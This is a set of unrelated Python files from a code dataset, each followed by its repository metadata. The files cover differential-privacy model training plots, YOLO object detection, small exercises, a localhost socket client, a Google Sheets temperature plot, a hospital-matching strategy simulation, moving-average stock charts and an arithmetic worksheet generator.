model.scale_norm_3, model.res3, model.scale_norm_4,
model.deco3, model.deco4, model.scale_norm_5,
model.scale_norm_5, model.res4, model.scale_norm_6]
plots_titles = [
"conv2", "res1", "scale_norm_1",
"conv4", "res2", "scale_norm_2",
"conv5", "deco1", "scale_norm_3",
"scale_norm_3", "res3", "scale_norm_4",
"deco3", "deco4", "scale_norm_5",
"scale_norm_5", "res4", "scale_norm_6"
]
criterion = smp.losses.DiceLoss(mode="binary")
optimizer = torch.optim.NAdam(model.parameters(), lr=0.0005)
scheduler = ReduceLROnPlateau(optimizer, mode="min", patience=4, factor=0.5, verbose=True)
visualisation = {}
get_all_layers(model)
privacy_engine = PrivacyEngine()
model, optimizer, train_loader = privacy_engine.make_private_with_epsilon(
module=model,
optimizer=optimizer,
data_loader=train_loader,
target_delta=1e-5,
target_epsilon=args.target_epsilon,
max_grad_norm=1.5,
epochs=args.epochs,
)
optimizer.defaults = optimizer.original_optimizer.defaults
val_loss_list = []
dice_score_list = []
with BatchMemoryManager(
data_loader=train_loader,
max_physical_batch_size=16,
optimizer=optimizer
) as memory_safe_data_loader:
for epoch in range(args.epochs):
print(f"Epoch {epoch+1}:")
train(memory_safe_data_loader, model, optimizer, criterion, params.device)
dice_score, loss = test(val_loader, model, criterion, params.device)
val_loss_list.append(loss)
dice_score_list.append(dice_score) # .cpu().detach().numpy()
scheduler.step(dice_score)
print(f"acc: {max(dice_score_list)}, final eps: {privacy_engine.accountant.get_privacy_spent(delta=1e-5)}")
rows = 6
columns = 3
fig = plt.figure(figsize=(columns * 6, rows * 4))
fig.suptitle("test_title", fontsize=16)
for i in range(len(modules_to_visualize)):
fig.add_subplot(rows, columns, i+1)
pickle.dump(
visualisation[modules_to_visualize[i]],
open("histograms/{}_{}_{}_s{}_p{}_{}_{}.p".format(
args.dataset,
args.epochs,
args.norm_layer,
args.scale_norm,
args.privacy,
args.model_arch,
plots_titles[i]
), "wb")
)
plt.hist(
visualisation[modules_to_visualize[i]],
bins=50,
range=(-2, 6)
)
plt.title("{}".format(plots_titles[i]))
fig.gca().autoscale()
plt.savefig('histograms/{}_{}_{}_{}_{}_s{}_p{}.png'.format(
datetime.now().strftime("%Y-%m-%d_%H-%M-%S"),
args.model_arch,
args.dataset,
args.epochs,
args.norm_layer,
args.scale_norm,
args.privacy
))
plt.close(fig)
print("Plot saved")
| mrchntia/ScaleNorm | semantic_segmentation/hist_plot.py | hist_plot.py | py | 6,311 | python | en | code | 1 | github-code | 50 |
14825640393 | from PIL import Image,ImageDraw
from utils.operation import YOLO
def detect(onnx_path='ReqFile/yolov5n-7-k5.onnx',img_path=r'ReqFile/bus.jpg',show=True):
'''
检测目标,返回目标所在坐标如:
{'crop': [57, 390, 207, 882], 'classes': 'person'},...]
:param onnx_path:onnx模型路径
:param img:检测用的图片
:param show:是否展示
:return:
'''
yolo = YOLO(onnx_path=onnx_path)
det_obj = yolo.decect(img_path)
# 结果
print (det_obj)
# 画框框
if show:
img = Image.open(img_path)
draw = ImageDraw.Draw(img)
for i in range(len(det_obj)):
draw.rectangle(det_obj[i]['crop'],width=3)
img.show() # 展示
if __name__ == "__main__":
detect() | luosaidage/yolov5_onnx_server | detect.py | detect.py | py | 765 | python | en | code | 35 | github-code | 50 |
33912968454 | '''
Ejercicio 4 de la guía Nº3
Utilizando la interación while, recibe como entrada
dos números de inicio y final e informa cuantos números de ellos
son múltiplos de 2 y 7
según entendi de esto, que da un intervalo de números y a apartir de ahí
te dice cuales son los números que están en ese intervalo que son
múltiplos de 2 y 7.
'''
inicio = int(input("Ingrese un número de inicio: "))
final = int(input("Ingrese un número de final: "))
acomulador = 0
contador = 0
i = 0
rango = abs(final - inicio)
print("Los números que son múltiplos de 2 y 7 son: ", end="")
while i <= rango:
acomulador = inicio + i
if acomulador % 2 == 0 and acomulador % 7 == 0:
print(acomulador," ", end="")
i += 1
| sebacassone/programacion_ejercicios | Python/Cátedra/34.py | 34.py | py | 730 | python | es | code | 1 | github-code | 50 |
16091772252 | import socket
import re
pattern = r'(^|\s)[-a-z0-9_.]+@([-a-z0-9]+\.)+[a-z]{2,6}(\s|$)'
file = open("T25.4_file.txt")
sock = socket.socket()
host, port = socket.gethostname(), 12345
sock.connect((host, port))
sock.send(pattern.encode())
msg = sock.recv(1024).decode()
print(msg)
for line in file:
sock.send(' '.join(line.split()).encode())
msg = sock.recv(1024).decode()
print(msg)
sock.close()
| andriidem308/python_practice | matfiz_tasks/Topic25_Sockets/T25.4_client.py | T25.4_client.py | py | 416 | python | en | code | 1 | github-code | 50 |
71371652634 | import gspread
from oauth2client.service_account import ServiceAccountCredentials
import matplotlib.pyplot as plt
scope = ["https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive"]
creds = ServiceAccountCredentials.from_json_keyfile_name('credentials.json', scope)
client = gspread.authorize(creds)
sheet = client.open("Teste Python").sheet1
temp = sheet.col_values(1)
time = sheet.col_values(2)
t = []
for i in temp:
t.append(float(i))
plt.title("Monitoramento de temperatura")
plt.ylabel("Temperatura / °C")
plt.xlabel("Hora")
plt.axis(ymin=0.0, ymax=40.0)
plt.plot(time, t, label="Temperaturas", marker="o")
plt.legend()
plt.grid(True)
plt.show()
'''
scopes = ["https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive"]
json_file = "credentials.json"
'''
"""
def login():
credentials = service_account.Credentials.from_service_account_file(json_file)
scoped_credentials = credentials.with_scopes(scopes)
gc = gspread.authorize(scoped_credentials)
return gc
def leitor(aba):
gc = login()
planilha = gc.open("data")
aba = planilha.worksheet("Página1")
dados = aba.get_all_records()
df = pd.DataFrame(dados)
return df
def escritor(lista):
gc = login()
planilha = gc.open('Nome da Planilha')
planilha = planilha.worksheet('Nome da Aba')
planilha.append_row(lista, value_input_option='USER_ENTERED')
""" | Raj326/Monitoramento-de-Ambiente | dashboard.py | dashboard.py | py | 1,457 | python | en | code | 0 | github-code | 50 |
24162568413 | from data import Hospitals, StatisticsStudent
import matplotlib.pyplot as plt
from copy import deepcopy
import numpy as np
import assignments
import lpsolver
import csv
import random
import pandas as pd
import collections
from matplotlib.ticker import MaxNLocator
import glob
def make_student_list(hospitals, num_students=638):
    """Build a cohort of identical students who all report their true priorities.

    Every student ranks the hospitals in the same order (``hospitals.names``),
    and each student's reported list equals their priority list.

    :param hospitals: object exposing a ``names`` sequence of hospital names
        (presumably a ``Hospitals`` instance from ``data`` -- confirmed only
        by attribute usage here).
    :param num_students: total number of students to create; defaults to the
        originally hard-coded cohort size of 638.
    :return: list of ``StatisticsStudent`` objects with ids 1..num_students.
    """
    student = StatisticsStudent(1)
    # NOTE(review): ``reported`` and ``priorities`` alias the same list object
    # here (and, for student 1, ``hospitals.names`` itself) -- TODO confirm
    # this sharing is intended. The deepcopy below gives every later student
    # independent copies of all fields (reported, priorities, ...).
    student.reported = student.priorities = hospitals.names
    student_list = [student]
    for i in range(2, num_students + 1):
        duplicate_student = deepcopy(student)
        # Only the id differs between students.
        duplicate_student.id = i
        student_list.append(duplicate_student)
    return student_list
# shuffle a random reported list for the first student and return the updated list
def shuffle_one_student(student_priorities):
    """Shuffle ``student_priorities`` in place and return it.

    Uses NumPy's global RNG; note that ``np.random.shuffle`` mutates its
    argument, so the returned object is the same list/array, not a copy.
    """
    np.random.shuffle(student_priorities)
    return student_priorities
# After all students submit the same reported list (except possibly student[0]),
# run a lottery and check whether student[0] gets better probabilities.
def make_lottery(students, hospitals, num_of_iter):
    """Run the assignment lottery for the students' current reports.

    First obtains the hospital ordering, then estimates expected assignment
    probabilities over ``num_of_iter`` simulated lotteries, and finally
    refines those probabilities by solving the LP assignment problem.

    :return: tuple ``(new_probs, order)`` -- the LP-adjusted probabilities
        and the hospital ordering used to compute them.
    """
    hospital_order = assignments.get_hospitals_order(hospitals)
    expected_probs = assignments.expected_hat(
        students, hospitals, hospital_order, num_of_iter)
    lp_problem = lpsolver.AssignmentProblem(expected_probs, hospital_order, students)
    return lp_problem.solve(), hospital_order
def swap(list, index_a, index_b):
    """Exchange the elements at ``index_a`` and ``index_b`` in place.

    Returns ``None``; the sequence itself is mutated.
    NOTE(review): the parameter name shadows the builtin ``list``; kept
    unchanged so keyword callers (if any) are not broken.
    """
    list[index_a], list[index_b] = list[index_b], list[index_a]
# change priorities in percentage chance
def flip_priorities(students, num_of_filps, percentage_chance):
    """Randomly perturb each student's priority list in place.

    For every student, attempt ``num_of_filps`` swaps; each attempt actually
    swaps two uniformly chosen positions with probability
    ``percentage_chance``.  (The two chosen positions may coincide, in which
    case the swap is a no-op.)

    :return: the same ``students`` list, with priorities mutated in place.
    """
    # NOTE(review): "filps" is a typo for "flips"; parameter name kept for
    # interface stability.
    for student in students:
        for _ in range(num_of_filps):
            ranking = student.priorities
            # With probability percentage_chance, swap two random entries.
            if random.random() < percentage_chance:
                top = len(ranking) - 1
                first, second = random.randint(0, top), random.randint(0, top)
                swap(ranking, first, second)
    return students
def fill_strategy(priorities_queue, strategy):
    """Fill the empty ("") slots of *strategy* from *priorities_queue*.

    Pops one hospital name from the queue per slot of *strategy*; names
    already placed in *strategy* are skipped, the rest are written into
    the leftmost empty slots.  Mutates *strategy* in place.
    """
    for _ in range(len(strategy)):
        candidate = priorities_queue.popleft()
        if candidate in strategy:
            continue
        # leftmost still-empty slot, or None when the strategy is already full
        # (replaces try/next/except StopIteration with next()'s default arg)
        slot = next((i for i, item in enumerate(strategy) if item == ""), None)
        if slot is not None:
            strategy[slot] = candidate
# strategy 1: one place up - from top 5 hospitals if you can take each of them one place up
def strategy1(priorities, strategy, top5, hospital_value):
    """Strategy 1: try to move each of the *top5* hospitals one slot up.

    A hospital stays where it is when it is already first, when
    hospital_value at that index equals the student's entry, or when the
    slot above is already taken.  Mutates and returns *strategy*.
    """
    for i in sorted(priorities.index(name) for name in top5):
        movable = i - 1 >= 0 and hospital_value[i] != priorities[i]
        if movable and strategy[i - 1] == "":
            strategy[i - 1] = priorities[i]
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 2: one place down - from last 5 hospitals if you can take each of them one place down
def strategy2(priorities, strategy, last5, hospital_value):
    """Strategy 2: try to move each of the *last5* hospitals one slot down.

    Positions are processed bottom-up.  A hospital keeps its position when
    it is already last, when hospital_value at that index equals the
    student's entry, or when the slot below is already taken.
    Mutates *strategy* in place and returns it.
    """
    indices = [priorities.index(x) for x in last5]
    indices.sort(reverse=True)
    for i in indices:
        # already last, or ranking matches the student's list -> don`t move
        if i+1 >= len(strategy) or hospital_value[i] == priorities[i]:
            strategy[i] = priorities[i]
        elif strategy[i+1] == "":
            strategy[i + 1] = priorities[i]
        # if the new position is already taken -> don`t move
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 3: two place up - from top 3 hospitals if you can take each of them 2 place up
def strategy3(priorities, strategy, top3, hospital_value):
    """Strategy 3: try to move each of the *top3* hospitals two slots up.

    Falls back to one slot up when the two-up slot is taken, and keeps the
    original position when neither slot is free, when the hospital is in
    the first two rows, or when hospital_value at that index equals the
    student's entry.  Mutates and returns *strategy*.
    """
    indices = [priorities.index(x) for x in top3]
    indices.sort()
    for i in indices:
        # already near the top, or ranking matches the student -> stay put
        if i - 2 < 0 or hospital_value[i] == priorities[i]:
            strategy[i] = priorities[i]
        # two-up slot is free -> take it
        elif strategy[i - 2] == "":
            strategy[i - 2] = priorities[i]
        # BUGFIX: was `elif [i-1] == "":`, which compares a one-element list
        # against a string and is always False — the one-up fallback was
        # unreachable and the hospital silently stayed in place.
        elif strategy[i - 1] == "":
            strategy[i - 1] = priorities[i]
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 4 : two place down - from last 3 hospitals if you can take each of them 2 place down
def strategy4(priorities, strategy, last3, hospital_value):
    """Strategy 4: try to move each of the *last3* hospitals two slots down.

    Falls back to one slot down when the two-down slot is taken; keeps the
    original position when neither slot is free, when the hospital is in
    the last two rows, or when hospital_value at that index equals the
    student's entry.  Mutates *strategy* in place and returns it.
    """
    indices = [priorities.index(x) for x in last3]
    indices.sort(reverse=True)
    for i in indices:
        # already near the bottom, or ranking matches -> don`t move
        if i+2 >= len(strategy) or hospital_value[i] == priorities[i]:
            strategy[i] = priorities[i]
        elif strategy[i+2] == "":
            strategy[i + 2] = priorities[i]
        # two-down slot taken -> try one slot down instead
        elif strategy[i+1] == "":
            strategy[i+1] = priorities[i]
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 5: from top3 hospitals - take each one up place, last3 - one down
def strategy5(priorities, strategy, last3, top3, hospital_value):
    """Strategy 5: move *top3* hospitals one slot up and *last3* one slot down.

    The top-3 pass runs top-down first, then the last-3 pass bottom-up; a
    hospital stays put at a boundary, when hospital_value at its index
    equals the student's entry, or when the target slot is already taken.
    Mutates *strategy* in place and returns it.
    """
    indices_top = [priorities.index(x) for x in top3]
    indices_top.sort()
    for i in indices_top:
        # already first, or ranking matches the student's list -> don`t move
        if i-1 < 0 or hospital_value[i] == priorities[i]:
            strategy[i] = priorities[i]
        # slot above is free -> move one place up
        elif strategy[i-1] == "":
            strategy[i-1] = priorities[i]
        # slot above already taken -> stay put
        else:
            strategy[i] = priorities[i]
    indices_last = [priorities.index(x) for x in last3]
    indices_last.sort(reverse=True)
    for i in indices_last:
        # already last, or ranking matches the student's list -> don`t move
        if i+1 >= len(strategy) or hospital_value[i] == priorities[i]:
            strategy[i] = priorities[i]
        elif strategy[i+1] == "":
            strategy[i + 1] = priorities[i]
        # slot below already taken -> stay put
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 6 : positions of 15-19 - if you can take each one place up
def strategy6(priorities, strategy, five_better_last5, hospital_value):
    """Strategy 6: try to move each hospital in *five_better_last5*
    (positions 15-19 of the hospital ranking) one slot up.

    A hospital stays put when it is already first, when hospital_value at
    that index equals the student's entry, or when the slot above is taken.
    Mutates *strategy* in place and returns it.
    """
    indices = [priorities.index(x) for x in five_better_last5]
    indices.sort(reverse=True)
    for i in indices:
        # already first, or ranking matches the student's list -> don`t move
        if i-1 < 0 or hospital_value[i] == priorities[i]:
            strategy[i] = priorities[i]
        elif strategy[i-1] == "":
            strategy[i - 1] = priorities[i]
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 7: same priorities as hospital values
# def strategy7(priorities, strategy, hospital_value):
# return hospital_value
# strategy 8: move item rated 20(according to hospital value) to position 5 of priorities()
# def strategy8(priorities, strategy, rate_20, hospital_value):
# strategy[4] = rate_20
# return strategy
# strategy 9: positions of top5 - move one place down
def strategy9(priorities, strategy, top5):
    """Strategy 9: push each of the *top5* hospitals one slot down.

    Processes positions bottom-up; a hospital stays in place when it is
    already last or the slot below is occupied.  Mutates and returns
    *strategy*.
    """
    for i in sorted((priorities.index(name) for name in top5), reverse=True):
        below = i + 1
        if below < len(strategy) and strategy[below] == "":
            strategy[below] = priorities[i]
        else:
            strategy[i] = priorities[i]
    return strategy
# strategy 10: positions of last5 - move one place up
def strategy10(priorities, strategy, last5):
    """Strategy 10: try to move each of the *last5* hospitals one slot up.

    Unlike strategies 1-6 there is no hospital_value check here; a hospital
    stays put only when it is already first or the slot above is taken.
    Mutates *strategy* in place and returns it.
    """
    indices = [priorities.index(x) for x in last5]
    indices.sort()
    for i in indices:
        # already first -> don`t move
        if i-1 < 0:
            strategy[i] = priorities[i]
        elif strategy[i-1] == "":
            strategy[i - 1] = priorities[i]
        else:
            strategy[i] = priorities[i]
    return strategy
def get_strategies(hospital_value: list, priorities):
    """Build the 10 candidate "trickster" priority lists.

    *hospital_value* is the hospitals ranked by value; *priorities* is the
    student's true preference order.  Each strategy perturbs *priorities*
    (moving selected hospitals up/down) and is then completed from the
    remaining true priorities via fill_strategy.
    """
    # one empty strategy (list of "" slots) per candidate strategy
    strategies = [["" for x in range(len(priorities))] for i in range(10)]
    # queue with all the priorities by order (copied before each fill)
    priorities_queue = collections.deque()
    [priorities_queue.append(i) for i in priorities]
    # strategy 1: one place up - top 5 from hospital_value
    top5 = hospital_value[:5]
    strategies[0] = strategy1(priorities, strategies[0], top5, hospital_value)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[0])
    # strategy 2: one place down - last 5 from hospital_value
    last5 = hospital_value[-5:]
    strategies[1] = strategy2(priorities, strategies[1], last5, hospital_value)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[1])
    # strategy 3: two place up - top 3 from hospital_value
    top3 = hospital_value[:3]
    strategies[2] = strategy3(priorities, strategies[2], top3, hospital_value)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[2])
    # strategy 4: two place down - last 3 from hospital_value
    last3 = hospital_value[-3:]
    strategies[3] = strategy4(priorities, strategies[3], last3, hospital_value)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[3])
    # strategy 5: top3 - one up, last3 - one down, from hospital_value
    last3 = hospital_value[-3:]
    top3 = hospital_value[:3]
    strategies[4] = strategy5(priorities, strategies[4], last3, top3, hospital_value)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[4])
    # strategy 6: positions of 15-19 - one up
    before_last5 = hospital_value[15:20:1]
    strategies[5] = strategy6(priorities, strategies[5], before_last5, hospital_value)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[5])
    # strategy 7: same priorities as hospital values
    # NOTE(review): assigns the hospital_value list itself (aliasing), not a
    # copy — later mutation of strategies[6] would change hospital_value too.
    strategies[6] = hospital_value
    # strategy 8: move item rated 20 (hospital value) to position 5 of priorities
    # NOTE(review): index 20 is the 21st-ranked hospital; assumes
    # len(hospital_value) >= 21 — confirm against the hospitals data.
    strategies[7][4] = hospital_value[20]
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[7])
    # strategy 9: positions of top5 - one down
    strategies[8] = strategy9(priorities, strategies[8], top5)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[8])
    # strategy 10: positions of last5 - one up
    strategies[9] = strategy10(priorities, strategies[9], last5)
    # fill the rest places of the strategy according to the real priorities
    fill_strategy(priorities_queue.copy(), strategies[9])
    return strategies
def simulation_flips_changes(num_of_flips, students, hospitals, sim_number):
    """Run one flip round and test all 10 trickster strategies for student 0.

    Flips every student's priorities (probability 0.5 per flip), computes the
    baseline happiness of student 0, then re-runs the lottery once per
    strategy.  Strategies that beat the baseline are appended to
    results/improvement_happiness<sim_number>.csv (header written on the
    num_of_flips == 0 round).  Returns [(num_of_flips, improvements)] or [].
    """
    # students after the flips
    students = flip_priorities(students, num_of_flips, 0.5)
    # get the probs if everyone has the same reported priorities
    lottery_probs_same, order = make_lottery(students, hospitals, 100)
    # happiness of everyone
    happiness = lpsolver.get_happiness_coeff(order, students)
    # happiness of the first student (baseline, before any strategy)
    result_happiness = np.dot(happiness[0], lottery_probs_same[0])
    print("before......:", result_happiness)
    improvement_happiness = []
    tuple_improve = list()
    hospital_value = hospitals.values
    strategies = get_strategies(hospital_value, deepcopy(students[0].priorities))
    for i in range(len(strategies)):
        # set the priorities of the first student with the i strategy
        students[0].priorities = strategies[i]
        lottery_probs, o = make_lottery(students, hospitals, 100)
        # happiness of student 0 under this strategy's lottery
        result_happiness_after = np.dot(happiness[0], lottery_probs[0])
        print("after:", result_happiness_after)
        if result_happiness_after > result_happiness:
            improvement_happiness.append((students[0].priorities, result_happiness, result_happiness_after, i, num_of_flips))
    # if improvement_happiness not empty print the details
    if improvement_happiness or num_of_flips == 0:
        with open('results/improvement_happiness' + str(sim_number) + '.csv', 'a', newline='') as resultFile:
            csv_out = csv.writer(resultFile)
            if num_of_flips == 0:
                csv_out.writerow(['priorities', 'real_happiness', 'after_strategy_happiness','strategy_id','num_of_flips'])
            for tup in improvement_happiness:
                csv_out.writerow(tup)
        tuple_improve.append((num_of_flips, len(improvement_happiness)))
    return tuple_improve
# all the students have the same priorities and we choose th first student and
# changing his priorities randomly and calculate his new happiness according
# of his new priorities
# it seems he always succeed to improve his happiness
def flip_simulation(sim_number):
    """Run one full simulation: 20 flip rounds over the same student cohort.

    Results are appended to results/improvement_happiness<sim_number>.csv by
    simulation_flips_changes; a summary list is printed at the end.
    """
    tuple_improve = list()
    # hospitals have 2 fields : 1. names of hospitals, 2. num of seats to each hospital
    hospitals = Hospitals.from_csv("res/seats_2018.csv")
    # list of students with the same priorities
    students = make_student_list(hospitals)
    # run 20 rounds, increasing the flip count each round
    num_of_flips = 20
    for i in range(num_of_flips):
        tup = simulation_flips_changes(i, students, hospitals, sim_number)
        if tup:
            tuple_improve.append(tup)
            print(tup)
    print(" ")
    print("tuple improve results list: ")
    print(tuple_improve)
def graph_flip_succeed_example():
    """Plot improvements-per-flip-count for a single simulation CSV.

    Reads results/improvement_happiness0.csv and saves the figure to
    results/flips_improvements_counter_one_simulation.png.
    """
    # open and read the file results
    # NOTE(review): the handle is never closed — consider a `with` block.
    result_file = open('results/improvement_happiness0.csv')
    df = pd.read_csv(result_file)
    # count how many improvements occurred at each flip count
    flips_column = df['num_of_flips'].real
    num_of_flips, succeed_counter = np.unique(flips_column, return_counts=True)
    fig, ax = plt.subplots()
    ax.yaxis.set_major_locator(MaxNLocator(integer=True))
    ax.xaxis.set_major_locator(MaxNLocator(integer=True))
    ax.plot(num_of_flips, succeed_counter)
    ax.set(xlabel='number of flips', ylabel='improvements counter', title='improvements by flips number one_simulation')
    ax.grid()
    fig.savefig("results/flips_improvements_counter_one_simulation.png")
    plt.show()
def graph_flips_average_sum():
    """Aggregate every results/*.csv file and plot the average number of
    happiness improvements per flip count.

    The figure is saved to results/flips_improvements_average_results.png
    and also shown interactively.
    """
    # BUGFIX: was np.zeros(1), which injected a phantom flip-count of 0.0
    # into the aggregated data and inflated the count at num_of_flips == 0.
    improvements_counter = np.empty(0)
    files_counter = 0
    for result_file in glob.glob('results/*.csv'):
        files_counter += 1
        # `with` ensures each handle is closed (the original leaked them)
        with open(result_file) as result:
            df = pd.read_csv(result)
        # accumulate the num_of_flips column of every simulation file
        improvements_counter = np.append(improvements_counter, df['num_of_flips'].real)
    num_of_flips, succeed_counter = np.unique(improvements_counter, return_counts=True)
    # average per simulation file
    succeed_counter = np.divide(succeed_counter, files_counter)
    fig, ax = plt.subplots()
    ax.xaxis.set_major_locator(MaxNLocator(integer=True))
    ax.plot(num_of_flips, succeed_counter)
    ax.set(xlabel='number of flips', ylabel='improvements counter', title='Improvements by flips - Average')
    ax.grid()
    fig.savefig("results/flips_improvements_average_results.png")
    plt.show()
def processing_results():
    """Aggregate and plot the results of all completed simulations."""
    # full graph description (average sum of the improvements according to flips)
    graph_flips_average_sum()
    # graph of one simulation from one csv file
    # graph_flip_succeed_example()
# active flips simulation:
# num of flips get higher every iteration
# student[0] is the trickster - he have 10 strategies - trying to improve his condition
def run_flips_simulations():
    """Run 300 independent flip simulations (one results CSV file each)."""
    number_of_sim = 300
    for sim_num in range(number_of_sim):
        flip_simulation(sim_num)
# Entry point: run all flip simulations, then aggregate and plot the results.
# Guarded so importing this module no longer triggers the full 300-run sweep.
if __name__ == "__main__":
    run_flips_simulations()
    processing_results()
| adielcahana/OneSideMatching | simulations.py | simulations.py | py | 16,922 | python | en | code | 0 | github-code | 50 |
def sma(prices, nday):
    """Simple moving average of *prices* over an *nday* window.

    Returns a list the same length as *prices*.  Entry i is the mean of
    prices[i-nday:i] (the window ending just before i); the first *nday*
    entries stay 0 because there is not enough history.
    """
    n = len(prices)
    averages = [0] * n
    for end in range(nday, n):
        window = prices[end - nday:end]
        averages[end] = sum(window) / nday
    return averages
def read_data(file):
    """Read a Yahoo-Finance-style CSV and return (dates, prices).

    *dates* is column 0 and *prices* is column 5 (Adj Close) of every
    non-empty data row; the header row is skipped.

    The original opened/closed the handle manually (and leaked it if
    parsing raised); a `with` block guarantees it is released.
    """
    with open(file) as f:
        all_data_list = f.read().split('\n')
    data = [x.split(',') for x in all_data_list[1:] if x != '']
    dates = [d[0] for d in data]
    prices = [float(d[5]) for d in data]
    return dates, prices
import pandas as pd
from datetime import datetime
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
def makeplot(dates, prices, data_sma1, data_sma2):
    """Plot the COST closing prices with 10- and 50-day SMA overlays.

    Saves the figure to cost_sma10_sma50.png and opens an interactive
    window (plt.show() blocks until it is closed).
    """
    dates = pd.to_datetime(dates)
    DF = pd.DataFrame()
    DF['prices'] = prices
    DF['sma1'] = data_sma1
    DF['sma2'] = data_sma2
    DF = DF.set_index(dates)
    plt.figure(figsize=(12, 5))
    plt.title('Costco Wholesale Corporation (COST) 1 Year Data and SMA')
    plt.plot(DF['prices'], linestyle='--', color='red', linewidth=2.0, label='COST')
    plt.plot(DF['sma1'], color='green', linestyle='-.', linewidth=3.0, label='COST_sma10')
    plt.plot(DF['sma2'], 'bo', markersize=1.2, label='COST_sma50')
    # NOTE(review): y-limits are hard-coded for this specific price range
    plt.ylim(250, 400)
    plt.legend()
    plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m/%Y'))
    plt.gca().xaxis.set_major_locator(mdates.MonthLocator(interval=1))
    plt.savefig('cost_sma10_sma50.png')
    plt.show()
def zero_to_nan(values):
    """Return a copy of *values* with every 0 replaced by NaN, so
    matplotlib leaves a gap instead of drawing the warm-up zeros."""
    result = []
    for v in values:
        result.append(float('nan') if v == 0 else v)
    return result
def main():
    """Load COST price history, compute 10- and 50-day SMAs, and plot them."""
    dates, prices = read_data('COST.csv')
    # zeros mark the SMA warm-up region; convert to NaN so they are not drawn
    data_sma1 = zero_to_nan(sma(prices, 10))
    data_sma2 = zero_to_nan(sma(prices, 50))
    makeplot(dates, prices, data_sma1, data_sma2)


# Guarded so importing this module does not immediately read/plot the CSV.
if __name__ == "__main__":
    main()
7338054873 | import random as random
import numpy as np
import pandas as pd
class Operation:
    """One arithmetic fill-in-the-blank exercise.

    *operation* selects the type: 'sum', 'rest' (subtraction), 'mult',
    'div', or 'tocent' (complement to 10/100/1000).  number2 is always the
    hidden answer; printer is the formatted exercise string.
    """
    def __init__(self,operation):
        self.operation=operation
        # number1 and number3 are shown; number2 is the blank to solve
        self.number1, self.number2, self.number3 = self.election(operation)
        self.printer = self.printing(operation)
    def election(self,operation):
        """Draw random operands; return (shown, hidden_answer, result)."""
        if operation=='sum':
            a1 = random.randint(0,90)
            a2 = random.randint(0,90)
            return a1, a2, a1+a2
        elif operation=='rest':
            a1 = random.randint(0,10)
            a2 = random.randint(0,10)
            return a1+a2, a1, a2
        elif operation=='mult':
            a1 = random.randint(0,10)
            a2 = random.randint(0,10)
            return a1, a2, a1*a2
        elif operation=='div':
            # NOTE(review): a1 may be 0, producing "0 : [] = 0" whose blank
            # is ambiguous (any divisor works) — confirm this is intended.
            a1 = random.randint(0,10)
            a2 = random.randint(0,10)
            return a1*a2, a1, a2
        elif operation=='tocent':
            # randomly pick the target: 10, 100 or 1000
            t = random.randint(0,2)
            if t==0:
                n = random.randint(0,10)
                return n, 10-n, 10
            elif t==1:
                n = random.randint(0,100)
                return n, 100-n, 100
            elif t==2:
                n = random.randint(0,1000)
                return n, 1000-n, 1000
    def printing(self,operation):
        """Format the exercise; \\u25A1 is the empty-square blank symbol."""
        if operation=='sum':
            return str(self.number1) + ' + ' + u"\u25A1" + ' = '+ str(self.number3)
        elif operation=='rest':
            return str(self.number1) + ' - ' + u"\u25A1" + ' = '+ str(self.number3)
        elif operation=='mult':
            return str(self.number1) + ' '+u"\u2027"+' ' + u"\u25A1" + ' = '+ str(self.number3)
        elif operation=='div':
            return str(self.number1) + ' : ' + u"\u25A1" + ' = '+ str(self.number3)
        elif operation=='tocent':
            # |D|/|C|/|M| mark complement-to-10/100/1000 exercises
            if self.number3==10:
                return str(self.number1) + ' |D|'
            elif self.number3==100:
                return str(self.number1) + ' |C|'
            elif self.number3==1000:
                return str(self.number1) + ' |M|'
#operation = ['sum','rest','mult','div']
class Block:
    """A block of 30 exercises of a given kind.

    block 1: 30 additions; block 2: alternating sum/rest; block 3: a
    div/sum/rest/mult/sum rotation; block 4: 30 complement ('tocent')
    exercises.  self.list holds the formatted questions, self.sol the
    answers, in the same order.
    """
    def __init__(self,number):
        self.block = number
        self.list, self.sol = self.generate(number)
    def generate(self,number):
        """Return (questions, answers) for block type *number* (1-4)."""
        if number == 1:
            lista = []
            sol = []
            pos = 'sum'
            for i in range(30):
                o = Operation(pos)
                lista.append(o.printer)
                sol.append(o.number2)
            return lista, sol
        elif number ==2:
            lista = []
            sol = []
            pos = ['sum','rest']
            for i in range(15):
                for e in pos:
                    o = Operation(e)
                    lista.append(o.printer)
                    sol.append(o.number2)
            return lista , sol
        elif number ==3:
            lista = []
            sol = []
            pos = ['div','sum','rest','mult','sum']
            for i in range(6):
                for e in pos:
                    o = Operation(e)
                    lista.append(o.printer)
                    sol.append(o.number2)
            return lista, sol
        elif number ==4:
            lista = []
            sol = []
            pos = 'tocent'
            for i in range(30):
                o = Operation(pos)
                lista.append(o.printer)
                sol.append(o.number2)
            return lista, sol
class Sheet:
    """One printable worksheet: four exercise blocks plus its answer key.

    Instantiating a Sheet has side effects — it immediately writes
    ``questions_<idn>.xls`` and ``solutions_<idn>.xls`` to the CWD.
    """
    def __init__(self, idn):
        self.b = [Block(1), Block(2), Block(3), Block(4)]
        self.l = [self.b[i].list for i in range(len(self.b))]
        self.s = [self.b[i].sol for i in range(len(self.b))]
        self.name_q = 'questions_' + str(idn)
        self.name_s = 'solutions_' + str(idn)
        self.printer_questions()
        self.printer_sol()

    def printer_questions(self):
        """Write the questions workbook: each 5x6 exercise table followed by
        an empty answer grid and a column-header row."""
